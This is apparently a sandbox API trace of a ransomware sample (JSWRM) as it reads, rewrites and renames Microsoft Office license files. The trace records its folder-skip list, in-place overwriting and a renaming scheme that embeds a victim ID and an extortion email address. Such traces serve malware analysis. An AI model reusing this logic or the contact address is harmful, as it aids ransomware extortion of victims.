[0109.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0109.374] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0109.376] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.377] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0109.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.377] CloseHandle (hObject=0x45c) returned 1 [0109.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0109.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0109.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0109.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0109.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0109.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0109.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.377] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0109.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0109.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0109.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0109.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0109.378] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7470d9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea7470d9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea910c92, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b8f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_Trial2-pl.xrm-ms", cAlternateFileName="PR0900~1.XRM")) returned 1 [0109.378] lstrcmpiW (lpString1="ProPlusR_Trial2-pl.xrm-ms", lpString2=".") returned 1 [0109.378] lstrcmpiW (lpString1="ProPlusR_Trial2-pl.xrm-ms", lpString2="..") returned 1 [0109.378] lstrcmpiW (lpString1="ProPlusR_Trial2-pl.xrm-ms", lpString2="...") returned 1 [0109.378] lstrcmpiW (lpString1="ProPlusR_Trial2-pl.xrm-ms", lpString2="windows") returned -1 [0109.379] lstrcmpiW (lpString1="ProPlusR_Trial2-pl.xrm-ms", lpString2="recovery") returned -1 [0109.379] lstrcmpiW (lpString1="ProPlusR_Trial2-pl.xrm-ms", lpString2="perflogs") returned 1 [0109.379] lstrcmpiW (lpString1="ProPlusR_Trial2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0109.379] lstrcmpiW (lpString1="ProPlusR_Trial2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.379] lstrcmpiW (lpString1="ProPlusR_Trial2-pl.xrm-ms", lpString2="system volume information") returned -1 [0109.379] lstrcmpiW (lpString1="ProPlusR_Trial2-pl.xrm-ms", lpString2="msocache") returned 1 [0109.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0109.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial2-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0109.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0109.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial2-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Trial2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0109.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0109.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial2-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0109.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0109.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial2-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240ef8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Trial2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0109.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0109.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0109.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0109.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.380] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11151) returned 1 [0109.380] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b80) returned 0x24c1d0 [0109.380] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b80, lpOverlapped=0x0) returned 1 [0109.382] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.382] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b80, lpOverlapped=0x0) returned 1 [0109.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.382] CloseHandle (hObject=0x45c) returned 1 [0109.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0109.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0109.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0109.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0109.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0109.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0109.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.383] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0109.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0109.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0109.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0109.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0109.384] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea6884d4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea6884d4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea793584, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_Trial2-ppd.xrm-ms", cAlternateFileName="PRDFF3~1.XRM")) returned 1 [0109.384] lstrcmpiW (lpString1="ProPlusR_Trial2-ppd.xrm-ms", lpString2=".") returned 1 [0109.384] lstrcmpiW (lpString1="ProPlusR_Trial2-ppd.xrm-ms", lpString2="..") returned 1 [0109.384] lstrcmpiW (lpString1="ProPlusR_Trial2-ppd.xrm-ms", lpString2="...") returned 1 [0109.384] lstrcmpiW (lpString1="ProPlusR_Trial2-ppd.xrm-ms", lpString2="windows") returned -1 [0109.384] lstrcmpiW (lpString1="ProPlusR_Trial2-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.384] lstrcmpiW (lpString1="ProPlusR_Trial2-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.384] lstrcmpiW (lpString1="ProPlusR_Trial2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.384] lstrcmpiW (lpString1="ProPlusR_Trial2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.384] lstrcmpiW (lpString1="ProPlusR_Trial2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.384] lstrcmpiW (lpString1="ProPlusR_Trial2-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0109.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial2-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0109.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0109.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial2-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241268, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Trial2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0109.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0109.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0109.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial2-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0109.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0109.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial2-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x2413a8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Trial2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0109.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0109.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0109.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0109.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0109.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.385] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24424) returned 1 [0109.385] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f60) returned 0x24c1d0 [0109.385] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5f60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5f60, lpOverlapped=0x0) returned 1 [0109.388] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.388] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5f60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5f60, lpOverlapped=0x0) returned 1 [0109.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.388] CloseHandle (hObject=0x45c) returned 1 [0109.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0109.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0109.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0109.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0109.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0109.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0109.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.389] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0109.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0109.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0109.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0109.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0109.390] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea5efb78, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea5efb78, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea6ae6e2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d50, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_Trial2-ul-oob.xrm-ms", cAlternateFileName="PR3730~1.XRM")) returned 1 [0109.393] lstrcmpiW (lpString1="ProPlusR_Trial2-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.393] lstrcmpiW (lpString1="ProPlusR_Trial2-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.393] lstrcmpiW (lpString1="ProPlusR_Trial2-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.394] lstrcmpiW (lpString1="ProPlusR_Trial2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.394] lstrcmpiW (lpString1="ProPlusR_Trial2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.394] lstrcmpiW (lpString1="ProPlusR_Trial2-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.394] lstrcmpiW (lpString1="ProPlusR_Trial2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.394] lstrcmpiW (lpString1="ProPlusR_Trial2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.394] lstrcmpiW (lpString1="ProPlusR_Trial2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.394] lstrcmpiW (lpString1="ProPlusR_Trial2-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial2-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0109.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial2-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240fc0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Trial2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial2-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0109.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial2-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240ef8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Trial2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0109.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0109.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.394] RtlAllocateHeap (HeapHandle=0x1e0000, 